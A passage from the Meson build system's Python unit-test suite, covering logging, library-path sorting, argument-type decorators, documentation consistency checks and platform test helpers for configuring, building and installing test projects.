mesonbuild.mlog.log_once(mesonbuild.mlog.bold('foo'))
actual = f.getvalue().strip()
self.assertEqual(actual.count('foo'), 1, actual)
mesonbuild.mlog.log_once('foo')
actual = f.getvalue().strip()
self.assertEqual(actual.count('foo'), 1, actual)
f.truncate()
mesonbuild.mlog.warning('bar', once=True)
mesonbuild.mlog.warning('bar', once=True)
actual = f.getvalue().strip()
self.assertEqual(actual.count('bar'), 1, actual)
def test_sort_libpaths(self):
sort_libpaths = mesonbuild.dependencies.base.sort_libpaths
self.assertEqual(sort_libpaths(
['/home/mesonuser/.local/lib', '/usr/local/lib', '/usr/lib'],
['/home/mesonuser/.local/lib/pkgconfig', '/usr/local/lib/pkgconfig']),
['/home/mesonuser/.local/lib', '/usr/local/lib', '/usr/lib'])
self.assertEqual(sort_libpaths(
['/usr/local/lib', '/home/mesonuser/.local/lib', '/usr/lib'],
['/home/mesonuser/.local/lib/pkgconfig', '/usr/local/lib/pkgconfig']),
['/home/mesonuser/.local/lib', '/usr/local/lib', '/usr/lib'])
self.assertEqual(sort_libpaths(
['/usr/lib', '/usr/local/lib', '/home/mesonuser/.local/lib'],
['/home/mesonuser/.local/lib/pkgconfig', '/usr/local/lib/pkgconfig']),
['/home/mesonuser/.local/lib', '/usr/local/lib', '/usr/lib'])
self.assertEqual(sort_libpaths(
['/usr/lib', '/usr/local/lib', '/home/mesonuser/.local/lib'],
['/home/mesonuser/.local/lib/pkgconfig', '/usr/local/libdata/pkgconfig']),
['/home/mesonuser/.local/lib', '/usr/local/lib', '/usr/lib'])
def test_dependency_factory_order(self):
b = mesonbuild.dependencies.base
with tempfile.TemporaryDirectory() as tmpdir:
with chdir(tmpdir):
env = get_fake_env()
env.scratch_dir = tmpdir
f = b.DependencyFactory(
'test_dep',
methods=[b.DependencyMethods.PKGCONFIG, b.DependencyMethods.CMAKE]
)
actual = [m() for m in f(env, MachineChoice.HOST, {'required': False})]
self.assertListEqual([m.type_name for m in actual], ['pkgconfig', 'cmake'])
f = b.DependencyFactory(
'test_dep',
methods=[b.DependencyMethods.CMAKE, b.DependencyMethods.PKGCONFIG]
)
actual = [m() for m in f(env, MachineChoice.HOST, {'required': False})]
self.assertListEqual([m.type_name for m in actual], ['cmake', 'pkgconfig'])
def test_validate_json(self) -> None:
"""Validate the json schema for the test cases."""
try:
from jsonschema import validate, ValidationError
except ImportError:
if is_ci():
raise
raise unittest.SkipTest('Python jsonschema module not found.')
with Path('data/test.schema.json').open() as f:
schema = json.load(f)
errors = [] # type: T.Tuple[str, Exception]
for p in Path('test cases').glob('**/test.json'):
with p.open() as f:
try:
validate(json.load(f), schema=schema)
except ValidationError as e:
errors.append((p.resolve(), e))
for f, e in errors:
print('Failed to validate: "{}"'.format(f))
print(str(e))
self.assertFalse(errors)
def test_typed_pos_args_types(self) -> None:
@typed_pos_args('foo', str, int, bool)
def _(obj, node, args: T.Tuple[str, int, bool], kwargs) -> None:
self.assertIsInstance(args, tuple)
self.assertIsInstance(args[0], str)
self.assertIsInstance(args[1], int)
self.assertIsInstance(args[2], bool)
_(None, mock.Mock(), ['string', 1, False], None)
def test_typed_pos_args_types_invalid(self) -> None:
@typed_pos_args('foo', str, int, bool)
def _(obj, node, args: T.Tuple[str, int, bool], kwargs) -> None:
self.assertTrue(False) # should not be reachable
with self.assertRaises(InvalidArguments) as cm:
_(None, mock.Mock(), ['string', 1.0, False], None)
self.assertEqual(str(cm.exception), 'foo argument 2 was of type "float" but should have been "int"')
def test_typed_pos_args_types_wrong_number(self) -> None:
@typed_pos_args('foo', str, int, bool)
def _(obj, node, args: T.Tuple[str, int, bool], kwargs) -> None:
self.assertTrue(False) # should not be reachable
with self.assertRaises(InvalidArguments) as cm:
_(None, mock.Mock(), ['string', 1], None)
self.assertEqual(str(cm.exception), 'foo takes exactly 3 arguments, but got 2.')
with self.assertRaises(InvalidArguments) as cm:
_(None, mock.Mock(), ['string', 1, True, True], None)
self.assertEqual(str(cm.exception), 'foo takes exactly 3 arguments, but got 4.')
def test_typed_pos_args_varargs(self) -> None:
@typed_pos_args('foo', str, varargs=str)
def _(obj, node, args: T.Tuple[str, T.List[str]], kwargs) -> None:
self.assertIsInstance(args, tuple)
self.assertIsInstance(args[0], str)
self.assertIsInstance(args[1], list)
self.assertIsInstance(args[1][0], str)
self.assertIsInstance(args[1][1], str)
_(None, mock.Mock(), ['string', 'var', 'args'], None)
def test_typed_pos_args_varargs_not_given(self) -> None:
@typed_pos_args('foo', str, varargs=str)
def _(obj, node, args: T.Tuple[str, T.List[str]], kwargs) -> None:
self.assertIsInstance(args, tuple)
self.assertIsInstance(args[0], str)
self.assertIsInstance(args[1], list)
self.assertEqual(args[1], [])
_(None, mock.Mock(), ['string'], None)
def test_typed_pos_args_varargs_invalid(self) -> None:
@typed_pos_args('foo', str, varargs=str)
def _(obj, node, args: T.Tuple[str, T.List[str]], kwargs) -> None:
self.assertTrue(False) # should not be reachable
with self.assertRaises(InvalidArguments) as cm:
_(None, mock.Mock(), ['string', 'var', 'args', 0], None)
self.assertEqual(str(cm.exception), 'foo argument 4 was of type "int" but should have been "str"')
def test_typed_pos_args_varargs_invalid_mulitple_types(self) -> None:
@typed_pos_args('foo', str, varargs=(str, list))
def _(obj, node, args: T.Tuple[str, T.List[str]], kwargs) -> None:
self.assertTrue(False) # should not be reachable
with self.assertRaises(InvalidArguments) as cm:
_(None, mock.Mock(), ['string', 'var', 'args', 0], None)
self.assertEqual(str(cm.exception), 'foo argument 4 was of type "int" but should have been one of: "str", "list"')
def test_typed_pos_args_max_varargs(self) -> None:
@typed_pos_args('foo', str, varargs=str, max_varargs=5)
def _(obj, node, args: T.Tuple[str, T.List[str]], kwargs) -> None:
self.assertIsInstance(args, tuple)
self.assertIsInstance(args[0], str)
self.assertIsInstance(args[1], list)
self.assertIsInstance(args[1][0], str)
self.assertIsInstance(args[1][1], str)
_(None, mock.Mock(), ['string', 'var', 'args'], None)
def test_typed_pos_args_max_varargs_exceeded(self) -> None:
@typed_pos_args('foo', str, varargs=str, max_varargs=1)
def _(obj, node, args: T.Tuple[str, T.Tuple[str, ...]], kwargs) -> None:
self.assertTrue(False) # should not be reachable
with self.assertRaises(InvalidArguments) as cm:
_(None, mock.Mock(), ['string', 'var', 'args'], None)
self.assertEqual(str(cm.exception), 'foo takes between 1 and 2 arguments, but got 3.')
def test_typed_pos_args_min_varargs(self) -> None:
@typed_pos_args('foo', varargs=str, max_varargs=2, min_varargs=1)
def _(obj, node, args: T.Tuple[str, T.List[str]], kwargs) -> None:
self.assertIsInstance(args, tuple)
self.assertIsInstance(args[0], list)
self.assertIsInstance(args[0][0], str)
self.assertIsInstance(args[0][1], str)
_(None, mock.Mock(), ['string', 'var'], None)
def test_typed_pos_args_min_varargs_not_met(self) -> None:
@typed_pos_args('foo', str, varargs=str, min_varargs=1)
def _(obj, node, args: T.Tuple[str, T.List[str]], kwargs) -> None:
self.assertTrue(False) # should not be reachable
with self.assertRaises(InvalidArguments) as cm:
_(None, mock.Mock(), ['string'], None)
self.assertEqual(str(cm.exception), 'foo takes at least 2 arguments, but got 1.')
def test_typed_pos_args_min_and_max_varargs_exceeded(self) -> None:
@typed_pos_args('foo', str, varargs=str, min_varargs=1, max_varargs=2)
def _(obj, node, args: T.Tuple[str, T.Tuple[str, ...]], kwargs) -> None:
self.assertTrue(False) # should not be reachable
with self.assertRaises(InvalidArguments) as cm:
_(None, mock.Mock(), ['string', 'var', 'args', 'bar'], None)
self.assertEqual(str(cm.exception), 'foo takes between 2 and 3 arguments, but got 4.')
def test_typed_pos_args_min_and_max_varargs_not_met(self) -> None:
@typed_pos_args('foo', str, varargs=str, min_varargs=1, max_varargs=2)
def _(obj, node, args: T.Tuple[str, T.Tuple[str, ...]], kwargs) -> None:
self.assertTrue(False) # should not be reachable
with self.assertRaises(InvalidArguments) as cm:
_(None, mock.Mock(), ['string'], None)
self.assertEqual(str(cm.exception), 'foo takes between 2 and 3 arguments, but got 1.')
def test_typed_pos_args_variadic_and_optional(self) -> None:
@typed_pos_args('foo', str, optargs=[str], varargs=str, min_varargs=0)
def _(obj, node, args: T.Tuple[str, T.List[str]], kwargs) -> None:
self.assertTrue(False) # should not be reachable
with self.assertRaises(AssertionError) as cm:
_(None, mock.Mock(), ['string'], None)
self.assertEqual(
str(cm.exception),
'varargs and optargs not supported together as this would be ambiguous')
def test_typed_pos_args_min_optargs_not_met(self) -> None:
@typed_pos_args('foo', str, str, optargs=[str])
def _(obj, node, args: T.Tuple[str, T.Optional[str]], kwargs) -> None:
self.assertTrue(False) # should not be reachable
with self.assertRaises(InvalidArguments) as cm:
_(None, mock.Mock(), ['string'], None)
self.assertEqual(str(cm.exception), 'foo takes at least 2 arguments, but got 1.')
def test_typed_pos_args_min_optargs_max_exceeded(self) -> None:
@typed_pos_args('foo', str, optargs=[str])
def _(obj, node, args: T.Tuple[str, T.Optional[str]], kwargs) -> None:
self.assertTrue(False) # should not be reachable
with self.assertRaises(InvalidArguments) as cm:
_(None, mock.Mock(), ['string', '1', '2'], None)
self.assertEqual(str(cm.exception), 'foo takes at most 2 arguments, but got 3.')
def test_typed_pos_args_optargs_not_given(self) -> None:
@typed_pos_args('foo', str, optargs=[str])
def _(obj, node, args: T.Tuple[str, T.Optional[str]], kwargs) -> None:
self.assertEqual(len(args), 2)
self.assertIsInstance(args[0], str)
self.assertEqual(args[0], 'string')
self.assertIsNone(args[1])
_(None, mock.Mock(), ['string'], None)
def test_typed_pos_args_optargs_some_given(self) -> None:
@typed_pos_args('foo', str, optargs=[str, int])
def _(obj, node, args: T.Tuple[str, T.Optional[str], T.Optional[int]], kwargs) -> None:
self.assertEqual(len(args), 3)
self.assertIsInstance(args[0], str)
self.assertEqual(args[0], 'string')
self.assertIsInstance(args[1], str)
self.assertEqual(args[1], '1')
self.assertIsNone(args[2])
_(None, mock.Mock(), ['string', '1'], None)
def test_typed_pos_args_optargs_all_given(self) -> None:
@typed_pos_args('foo', str, optargs=[str])
def _(obj, node, args: T.Tuple[str, T.Optional[str]], kwargs) -> None:
self.assertEqual(len(args), 2)
self.assertIsInstance(args[0], str)
self.assertEqual(args[0], 'string')
self.assertIsInstance(args[1], str)
_(None, mock.Mock(), ['string', '1'], None)
@unittest.skipIf(is_tarball(), 'Skipping because this is a tarball release')
class DataTests(unittest.TestCase):
def test_snippets(self):
hashcounter = re.compile('^ *(#)+')
snippet_dir = Path('docs/markdown/snippets')
self.assertTrue(snippet_dir.is_dir())
for f in snippet_dir.glob('*'):
self.assertTrue(f.is_file())
if f.parts[-1].endswith('~'):
continue
if f.suffix == '.md':
in_code_block = False
with f.open() as snippet:
for line in snippet:
if line.startswith(' '):
continue
if line.startswith('```'):
in_code_block = not in_code_block
if in_code_block:
continue
m = re.match(hashcounter, line)
if m:
self.assertEqual(len(m.group(0)), 2, 'All headings in snippets must have two hash symbols: ' + f.name)
self.assertFalse(in_code_block, 'Unclosed code block.')
else:
if f.name != 'add_release_note_snippets_here':
self.assertTrue(False, 'A file without .md suffix in snippets dir: ' + f.name)
def test_compiler_options_documented(self):
'''
Test that C and C++ compiler options and base options are documented in
Builtin-Options.md. Only tests the default compiler for the current
platform on the CI.
'''
md = None
with open('docs/markdown/Builtin-options.md', encoding='utf-8') as f:
md = f.read()
self.assertIsNotNone(md)
env = get_fake_env()
# FIXME: Support other compilers
cc = env.detect_c_compiler(MachineChoice.HOST)
cpp = env.detect_cpp_compiler(MachineChoice.HOST)
for comp in (cc, cpp):
for opt in comp.get_options():
self.assertIn(str(opt), md)
for opt in comp.base_options:
self.assertIn(str(opt), md)
self.assertNotIn('b_unknown', md)
@staticmethod
def _get_section_content(name, sections, md):
for section in sections:
if section and section.group(1) == name:
try:
next_section = next(sections)
end = next_section.start()
except StopIteration:
end = len(md)
# Extract the content for this section
return md[section.end():end]
raise RuntimeError('Could not find "{}" heading'.format(name))
def test_builtin_options_documented(self):
'''
Test that universal options and base options are documented in
Builtin-Options.md.
'''
from itertools import tee
md = None
with open('docs/markdown/Builtin-options.md', encoding='utf-8') as f:
md = f.read()
self.assertIsNotNone(md)
found_entries = set()
sections = re.finditer(r"^## (.+)$", md, re.MULTILINE)
# Extract the content for this section
content = self._get_section_content("Universal options", sections, md)
subsections = tee(re.finditer(r"^### (.+)$", content, re.MULTILINE))
subcontent1 = self._get_section_content("Directories", subsections[0], content)
subcontent2 = self._get_section_content("Core options", subsections[1], content)
for subcontent in (subcontent1, subcontent2):
# Find the option names
options = set()
# Match either a table row or a table heading separator: | ------ |
rows = re.finditer(r"^\|(?: (\w+) .* | *-+ *)\|", subcontent, re.MULTILINE)
# Skip the header of the first table
next(rows)
# Skip the heading separator of the first table
next(rows)
for m in rows:
value = m.group(1)
# End when the `buildtype` table starts
if value is None:
break
options.add(value)
self.assertEqual(len(found_entries & options), 0)
found_entries |= options
self.assertEqual(found_entries, set([
*[str(k) for k in mesonbuild.coredata.BUILTIN_OPTIONS],
*[str(k) for k in mesonbuild.coredata.BUILTIN_OPTIONS_PER_MACHINE],
]))
# Check that `buildtype` table inside `Core options` matches how
# setting of builtin options behaves
#
# Find all tables inside this subsection
tables = re.finditer(r"^\| (\w+) .* \|\n\| *[-|\s]+ *\|$", subcontent2, re.MULTILINE)
# Get the table we want using the header of the first column
table = self._get_section_content('buildtype', tables, subcontent2)
# Get table row data
rows = re.finditer(r"^\|(?: (\w+)\s+\| (\w+)\s+\| (\w+) .* | *-+ *)\|", table, re.MULTILINE)
env = get_fake_env()
for m in rows:
buildtype, debug, opt = m.groups()
if debug == 'true':
debug = True
elif debug == 'false':
debug = False
else:
raise RuntimeError('Invalid debug value {!r} in row:\n{}'.format(debug, m.group()))
env.coredata.set_option(OptionKey('buildtype'), buildtype)
self.assertEqual(env.coredata.options[OptionKey('buildtype')].value, buildtype)
self.assertEqual(env.coredata.options[OptionKey('optimization')].value, opt)
self.assertEqual(env.coredata.options[OptionKey('debug')].value, debug)
def test_cpu_families_documented(self):
with open("docs/markdown/Reference-tables.md", encoding='utf-8') as f:
md = f.read()
self.assertIsNotNone(md)
sections = re.finditer(r"^## (.+)$", md, re.MULTILINE)
content = self._get_section_content("CPU families", sections, md)
# Find the list entries
arches = [m.group(1) for m in re.finditer(r"^\| (\w+) +\|", content, re.MULTILINE)]
# Drop the header
arches = set(arches[1:])
self.assertEqual(arches, set(mesonbuild.environment.known_cpu_families))
def test_markdown_files_in_sitemap(self):
'''
Test that each markdown files in docs/markdown is referenced in sitemap.txt
'''
with open("docs/sitemap.txt", encoding='utf-8') as f:
md = f.read()
self.assertIsNotNone(md)
toc = list(m.group(1) for m in re.finditer(r"^\s*(\w.*)$", md, re.MULTILINE))
markdownfiles = [f.name for f in Path("docs/markdown").iterdir() if f.is_file() and f.suffix == '.md']
exceptions = ['_Sidebar.md']
for f in markdownfiles:
if f not in exceptions:
self.assertIn(f, toc)
def test_vim_syntax_highlighting(self):
'''
Ensure that vim syntax highlighting files were updated for new
functions in the global namespace in build files.
'''
env = get_fake_env()
interp = Interpreter(FakeBuild(env), mock=True)
with open('data/syntax-highlighting/vim/syntax/meson.vim') as f:
res = re.search(r'syn keyword mesonBuiltin(\s+\\\s\w+)+', f.read(), re.MULTILINE)
defined = set([a.strip() for a in res.group().split('\\')][1:])
self.assertEqual(defined, set(chain(interp.funcs.keys(), interp.builtin.keys())))
def test_all_functions_defined_in_ast_interpreter(self):
'''
Ensure that the all functions defined in the Interpreter are also defined
in the AstInterpreter (and vice versa).
'''
env = get_fake_env()
interp = Interpreter(FakeBuild(env), mock=True)
astint = AstInterpreter('.', '', '')
self.assertEqual(set(interp.funcs.keys()), set(astint.funcs.keys()))
def test_mesondata_is_up_to_date(self):
from mesonbuild.mesondata import mesondata
err_msg = textwrap.dedent('''
###########################################################
### mesonbuild.mesondata is not up-to-date ###
### Please regenerate it by running tools/gen_data.py ###
###########################################################
''')
root_dir = Path(__file__).resolve().parent
mesonbuild_dir = root_dir / 'mesonbuild'
data_dirs = mesonbuild_dir.glob('**/data')
data_files = [] # type: T.List[T.Tuple(str, str)]
for i in data_dirs:
for p in i.iterdir():
data_files += [(p.relative_to(mesonbuild_dir).as_posix(), hashlib.sha256(p.read_bytes()).hexdigest())]
current_files = set(mesondata.keys())
scanned_files = set([x[0] for x in data_files])
self.assertSetEqual(current_files, scanned_files, err_msg + 'Data files were added or removed\n')
errors = []
for i in data_files:
if mesondata[i[0]].sha256sum != i[1]:
errors += [i[0]]
self.assertListEqual(errors, [], err_msg + 'Files were changed')
class BasePlatformTests(unittest.TestCase):
prefix = '/usr'
libdir = 'lib'
def setUp(self):
super().setUp()
self.maxDiff = None
src_root = os.path.dirname(__file__)
src_root = os.path.join(os.getcwd(), src_root)
self.src_root = src_root
# Get the backend
# FIXME: Extract this from argv?
self.backend = getattr(Backend, os.environ.get('MESON_UNIT_TEST_BACKEND', 'ninja'))
self.meson_args = ['--backend=' + self.backend.name]
self.meson_native_file = None
self.meson_cross_file = None
self.meson_command = python_command + [get_meson_script()]
self.setup_command = self.meson_command + self.meson_args
self.mconf_command = self.meson_command + ['configure']
self.mintro_command = self.meson_command + ['introspect']
self.wrap_command = self.meson_command + ['wrap']
self.rewrite_command = self.meson_command + ['rewrite']
# Backend-specific build commands
self.build_command, self.clean_command, self.test_command, self.install_command, \
self.uninstall_command = get_backend_commands(self.backend)
# Test directories
self.common_test_dir = os.path.join(src_root, 'test cases/common')
self.vala_test_dir = os.path.join(src_root, 'test cases/vala')
self.framework_test_dir = os.path.join(src_root, 'test cases/frameworks')
self.unit_test_dir = os.path.join(src_root, 'test cases/unit')
self.rewrite_test_dir = os.path.join(src_root, 'test cases/rewrite')
self.linuxlike_test_dir = os.path.join(src_root, 'test cases/linuxlike')
# Misc stuff
self.orig_env = os.environ.copy()
if self.backend is Backend.ninja:
self.no_rebuild_stdout = ['ninja: no work to do.', 'samu: nothing to do']
else:
# VS doesn't have a stable output when no changes are done
# XCode backend is untested with unit tests, help welcome!
self.no_rebuild_stdout = ['UNKNOWN BACKEND {!r}'.format(self.backend.name)]
self.builddirs = []
self.new_builddir()
def change_builddir(self, newdir):
self.builddir = newdir
self.privatedir = os.path.join(self.builddir, 'meson-private')
self.logdir = os.path.join(self.builddir, 'meson-logs')
self.installdir = os.path.join(self.builddir, 'install')
self.distdir = os.path.join(self.builddir, 'meson-dist')
self.mtest_command = self.meson_command + ['test', '-C', self.builddir]
self.builddirs.append(self.builddir)
def new_builddir(self):
if not is_cygwin():
# Keep builddirs inside the source tree so that virus scanners
# don't complain
newdir = tempfile.mkdtemp(dir=os.getcwd())
else:
# But not on Cygwin because that breaks the umask tests. See:
# https://github.com/mesonbuild/meson/pull/5546#issuecomment-509666523
newdir = tempfile.mkdtemp()
# In case the directory is inside a symlinked directory, find the real
# path otherwise we might not find the srcdir from inside the builddir.
newdir = os.path.realpath(newdir)
self.change_builddir(newdir)
def _print_meson_log(self):
log = os.path.join(self.logdir, 'meson-log.txt')
if not os.path.isfile(log):
print("{!r} doesn't exist".format(log))
return
with open(log, 'r', encoding='utf-8') as f:
print(f.read())
def tearDown(self):
for path in self.builddirs:
try:
windows_proof_rmtree(path)
except FileNotFoundError:
pass
os.environ.clear()
os.environ.update(self.orig_env)
super().tearDown()
def _run(self, command, *, workdir=None, override_envvars=None):
'''
Run a command while printing the stdout and stderr to stdout,
and also return a copy of it
'''
# If this call hangs CI will just abort. It is very hard to distinguish
# between CI issue and test bug in that case. Set timeout and fail loud
# instead.
if override_envvars is None:
env = None
else:
env = os.environ.copy()
env.update(override_envvars)
p = subprocess.run(command, stdout=subprocess.PIPE,
stderr=subprocess.STDOUT, env=env,
encoding='utf-8',
universal_newlines=True, cwd=workdir, timeout=60 * 5)
print(p.stdout)
if p.returncode != 0:
if 'MESON_SKIP_TEST' in p.stdout:
raise unittest.SkipTest('Project requested skipping.')
raise subprocess.CalledProcessError(p.returncode, command, output=p.stdout)
return p.stdout
def init(self, srcdir, *,
extra_args=None,
default_args=True,
inprocess=False,
override_envvars=None,
workdir=None):
self.assertPathExists(srcdir)
if extra_args is None:
extra_args = []
if not isinstance(extra_args, list):
extra_args = [extra_args]
args = [srcdir, self.builddir]
if default_args:
args += ['--prefix', self.prefix]
if self.libdir:
args += ['--libdir', self.libdir]
if self.meson_native_file:
args += ['--native-file', self.meson_native_file]
if self.meson_cross_file:
args += ['--cross-file', self.meson_cross_file]
self.privatedir = os.path.join(self.builddir, 'meson-private')
if inprocess:
try:
(returncode, out, err) = run_configure_inprocess(self.meson_args + args + extra_args, override_envvars)
if 'MESON_SKIP_TEST' in out:
raise unittest.SkipTest('Project requested skipping.')
if returncode != 0:
self._print_meson_log()
print('Stdout:\n')
print(out)
print('Stderr:\n')
print(err)
raise RuntimeError('Configure failed')
except Exception:
self._print_meson_log()
raise
finally:
# Close log file to satisfy Windows file locking
mesonbuild.mlog.shutdown()
mesonbuild.mlog.log_dir = None
mesonbuild.mlog.log_file = None
else:
try:
out = self._run(self.setup_command + args + extra_args, override_envvars=override_envvars, workdir=workdir)
except unittest.SkipTest:
raise unittest.SkipTest('Project requested skipping: ' + srcdir)
except Exception:
self._print_meson_log()
raise
return out
def build(self, target=None, *, extra_args=None, override_envvars=None):
if extra_args is None:
extra_args = []
# Add arguments for building the target (if specified),
# and using the build dir (if required, with VS)
args = get_builddir_target_args(self.backend, self.builddir, target)
return self._run(self.build_command + args + extra_args, workdir=self.builddir, override_envvars=override_envvars)
def clean(self, *, override_envvars=None):
dir_args = get_builddir_target_args(self.backend, self.builddir, None)
self._run(self.clean_command + dir_args, workdir=self.builddir, override_envvars=override_envvars)
def run_tests(self, *, inprocess=False, override_envvars=None):
if not inprocess:
self._run(self.test_command, workdir=self.builddir, override_envvars=override_envvars)
else:
with mock.patch.dict(os.environ, override_envvars):
run_mtest_inprocess(['-C', self.builddir])
def install(self, *, use_destdir=True, override_envvars=None):
if self.backend is not Backend.ninja:
raise unittest.SkipTest('{!r} backend can\'t install files'.format(self.backend.name))
if use_destdir:
destdir = {'DESTDIR': self.installdir}
if override_envvars is None:
override_envvars = destdir
else:
override_envvars.update(destdir)
self._run(self.install_command, workdir=self.builddir, override_envvars=override_envvars)
def uninstall(self, *, override_envvars=None):
self._run(self.uninstall_command, workdir=self.builddir, override_envvars=override_envvars)
def run_target(self, target, *, override_envvars=None):
'''
Run a Ninja target while printing the stdout and stderr to stdout,
and also return a copy of it
'''
return self.build(target=target, override_envvars=override_envvars)
def setconf(self, arg, will_build=True):
if not isinstance(arg, list):
arg = [arg]
if will_build:
ensure_backend_detects_changes(self.backend)
self._run(self.mconf_command + arg + [self.builddir])
def wipe(self):
windows_proof_rmtree(self.builddir)
def utime(self, f):
ensure_backend_detects_changes(self.backend)
os.utime(f)
def get_compdb(self):
if self.backend is not Backend.ninja:
raise unittest.SkipTest('Compiler db not available with {} backend'.format(self.backend.name))
try:
with open(os.path.join(self.builddir, 'compile_commands.json')) as ifile:
contents = json.load(ifile)
except FileNotFoundError:
raise unittest.SkipTest('Compiler db not found')
# If Ninja is using .rsp files, generate them, read their contents, and
# replace it as the command for all compile commands in the parsed json.
if len(contents) > 0 and contents[0]['command'].endswith('.rsp'):
# Pretend to build so that the rsp files are generated
self.build(extra_args=['-d', 'keeprsp', '-n'])
for each in contents:
# Extract the actual command from the rsp file
compiler, rsp = each['command'].split(' @')
rsp = os.path.join(self.builddir, rsp)
# Replace the command with its contents
with open(rsp, 'r', encoding='utf-8') as f:
each['command'] = compiler + ' ' + f.read()
return contents
def get_meson_log(self):
with open(os.path.join(self.builddir, 'meson-logs', 'meson-log.txt')) as f:
return f.readlines()
def get_meson_log_compiler_checks(self):
'''
Fetch a list command-lines run by meson for compiler checks.
Each command-line is returned as a list of arguments.
'''
log = self.get_meson_log()
prefix = 'Command line:'
cmds = [l[len(prefix):].split() for l in log if l.startswith(prefix)]
return cmds
def get_meson_log_sanitychecks(self):
'''
Same as above, but for the sanity checks that were run
'''
log = self.get_meson_log()
prefix = 'Sanity check compiler command line:'
cmds = [l[len(prefix):].split() for l in log if l.startswith(prefix)]
return cmds
def introspect(self, args):
if isinstance(args, str):
args = [args]
out = subprocess.check_output(self.mintro_command + args + [self.builddir],
universal_newlines=True)
return json.loads(out)
def introspect_directory(self, directory, args):
if isinstance(args, str):
args = [args]
out = subprocess.check_output(self.mintro_command + args + [directory],
universal_newlines=True)
try:
obj = json.loads(out)
except Exception as e:
print(out)
raise e
return obj
def assertPathEqual(self, path1, path2):
'''
Handles a lot of platform-specific quirks related to paths such as
separator, case-sensitivity, etc.
'''
self.assertEqual(PurePath(path1), PurePath(path2))
def assertPathListEqual(self, pathlist1, pathlist2):
self.assertEqual(len(pathlist1), len(pathlist2))
worklist = list(zip(pathlist1, pathlist2))
for i in worklist:
if i[0] is None:
self.assertEqual(i[0], i[1])
else:
self.assertPathEqual(i[0], i[1])
def assertPathBasenameEqual(self, path, basename):
msg = '{!r} does not end with {!r}'.format(path, basename)
# We cannot use os.path.basename because it returns '' when the path
# ends with '/' for some silly reason. This is not how the UNIX utility
# `basename` works.
path_basename = PurePath(path).parts[-1]
self.assertEqual(PurePath(path_basename), PurePath(basename), msg)
def assertReconfiguredBuildIsNoop(self):
'Assert that we reconfigured and then there was nothing to do'
ret = self.build()
self.assertIn('The Meson build system', ret)
if self.backend is Backend.ninja:
for line in ret.split('\n'):
if line in self.no_rebuild_stdout:
break
else:
raise AssertionError('build was reconfigured, but was not no-op')
elif self.backend is Backend.vs:
# Ensure that some target said that no rebuild was done
# XXX: Note CustomBuild did indeed rebuild, because of the regen checker!
self.assertIn('ClCompile:\n All outputs are up-to-date.', ret)
self.assertIn('Link:\n All outputs are up-to-date.', ret)
# Ensure that no targets were built
self.assertNotRegex(ret, re.compile('ClCompile:\n [^\n]*cl', flags=re.IGNORECASE))
self.assertNotRegex(ret, re.compile('Link:\n [^\n]*link', flags=re.IGNORECASE))
elif self.backend is Backend.xcode:
raise unittest.SkipTest('Please help us fix this test on the xcode backend')
else:
raise RuntimeError('Invalid backend: {!r}'.format(self.backend.name))
def assertBuildIsNoop(self):
ret = self.build()
if self.backend is Backend.ninja:
self.assertIn(ret.split('\n')[-2], self.no_rebuild_stdout)
elif self.backend is Backend.vs:
# Ensure that some target of each type said that no rebuild was done
# We always have at least one CustomBuild target for the regen checker
self.assertIn('CustomBuild:\n All outputs are up-to-date.', ret)
self.assertIn('ClCompile:\n All outputs are up-to-date.', ret)
self.assertIn('Link:\n All outputs are up-to-date.', ret)
# Ensure that no targets were built
self.assertNotRegex(ret, re.compile('CustomBuild:\n [^\n]*cl', flags=re.IGNORECASE))
self.assertNotRegex(ret, re.compile('ClCompile:\n [^\n]*cl', flags=re.IGNORECASE))
self.assertNotRegex(ret, re.compile('Link:\n [^\n]*link', flags=re.IGNORECASE))
elif self.backend is Backend.xcode:
raise unittest.SkipTest('Please help us fix this test on the xcode backend')
else:
raise RuntimeError('Invalid backend: {!r}'.format(self.backend.name))
def assertRebuiltTarget(self, target):
ret = self.build()
if self.backend is Backend.ninja:
self.assertIn('Linking target {}'.format(target), ret)
elif self.backend is Backend.vs:
# Ensure that this target was rebuilt
linkre = re.compile('Link:\n [^\n]*link[^\n]*' + target, flags=re.IGNORECASE)
self.assertRegex(ret, linkre)
elif self.backend is Backend.xcode:
raise unittest.SkipTest('Please help us fix this test on the xcode backend')
else:
raise RuntimeError('Invalid backend: {!r}'.format(self.backend.name))
@staticmethod
def get_target_from_filename(filename):
base = os.path.splitext(filename)[0]
if base.startswith(('lib', 'cyg')):
return base[3:]
return base
def assertBuildRelinkedOnlyTarget(self, target):
ret = self.build()
if self.backend is Backend.ninja:
linked_targets = []
for line in ret.split('\n'):
if 'Linking target' in line:
fname = line.rsplit('target ')[-1]
linked_targets.append(self.get_target_from_filename(fname))
self.assertEqual(linked_targets, [target])
elif self.backend is Backend.vs:
# Ensure that this target was rebuilt
linkre = re.compile(r'Link:\n [^\n]*link.exe[^\n]*/OUT:".\\([^"]*)"', flags=re.IGNORECASE)
matches = linkre.findall(ret)
self.assertEqual(len(matches), 1, msg=matches)
self.assertEqual(self.get_target_from_filename(matches[0]), target)
elif self.backend is Backend.xcode:
raise unittest.SkipTest('Please help us fix this test on the xcode backend')
else:
raise RuntimeError('Invalid backend: {!r}'.format(self.backend.name))
def assertPathExists(self, path):
m = 'Path {!r} should exist'.format(path)
self.assertTrue(os.path.exists(path), msg=m)
def assertPathDoesNotExist(self, path):
m = 'Path {!r} should not exist'.format(path)
self.assertFalse(os.path.exists(path), msg=m)
class AllPlatformTests(BasePlatformTests):
'''
Tests that should run on all platforms
'''
def test_default_options_prefix(self):
'''
Tests that setting a prefix in default_options in project() works.
Can't be an ordinary test because we pass --prefix to meson there.
https://github.com/mesonbuild/meson/issues/1349
'''
testdir = os.path.join(self.common_test_dir, '88 default options')
self.init(testdir, default_args=False, inprocess=True)
opts = self.introspect('--buildoptions')
for opt in opts:
if opt['name'] == 'prefix':
prefix = opt['value']
break
else:
raise self.fail('Did not find option "prefix"')
self.assertEqual(prefix, '/absoluteprefix')
def test_do_conf_file_preserve_newlines(self):
def conf_file(in_data, confdata):
with temp_filename() as fin:
with open(fin, 'wb') as fobj:
fobj.write(in_data.encode('utf-8'))
with temp_filename() as fout:
mesonbuild.mesonlib.do_conf_file(fin, fout, confdata, 'meson')
with open(fout, 'rb') as fobj:
return fobj.read().decode('utf-8')
confdata = {'VAR': ('foo', 'bar')}
self.assertEqual(conf_file('@VAR@\n@VAR@\n', confdata), 'foo\nfoo\n')
self.assertEqual(conf_file('@VAR@\r\n@VAR@\r\n', confdata), 'foo\r\nfoo\r\n')
def test_do_conf_file_by_format(self):
def conf_str(in_data, confdata, vformat):
